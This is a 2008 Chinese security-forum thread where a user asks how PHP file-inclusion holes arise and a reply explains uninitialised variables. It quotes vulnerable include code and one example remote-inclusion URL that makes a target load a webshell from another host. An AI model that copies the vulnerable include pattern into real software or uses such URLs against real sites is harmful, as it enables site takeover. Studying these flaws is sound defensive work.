Board logo

标题: [讨论]php文件包含的问题 [打印本页]

作者: s37su37    时间: 2008-7-20 23:18     标题: [讨论]php文件包含的问题

[讨论]php文件包含的问题
议题作者:消失再消失
信息来源:邪恶八进制信息安全团队(www.eviloctal.com


老是弄不懂这种漏洞是怎么来的,网上的包含漏洞介绍大约都是这样一段代码:
....
$id=$_GET["id"];
include($id);
....
因为变量id能被人为任意控制,所以造成了包含漏洞。
这里很容易理解。

但是看别人发布的文件包含漏洞是基本是这样类型的代码:
....
include_once $edp_relative_path."admin/serverdata.php";
....
只要向变量edp_relative_path提交一个webshell的地址,就能执行webshell了。
这里就不明白了,edp_relative_path这个变量是怎么来的?为什么可以人为控制?
我找了很久关于edp_relative_path这个变量的代码,都没有发现是哪里赋的值。

还有就是,为什么有些远程包含漏洞在包含了文件之后还要加一个“?”啊?如“http://www.bajinzhi.net/l.php?i=http://bbb.com/love.php?

请高人指点啊小鸡鸡重出江湖了~~!!
帖子119 精华0 积分3244 阅读权限100 性别男 在线时间143 小时 注册时间2007-7-31 最后登录2008-7-18 查看详细资料报告 TOP 让女孩一夜变的更有女人味


dingking
荣誉会员

作者: TAMAMA    时间: 2008-7-20 23:18

貌似PHP中不需要先定义变量的。~直接 $xxx 就可以用了。~。~~

include_once $edp_relative_path."admin/serverdata.php";  直接定义就赋值了.....

~~昨天是明天的前天今天是昨天的明天明天是昨天的后天    ╰o╯╰o╯
帖子741 精华2 积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-18 查看详细资料报告 TOP 您知道您年薪应是多少?

winger
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2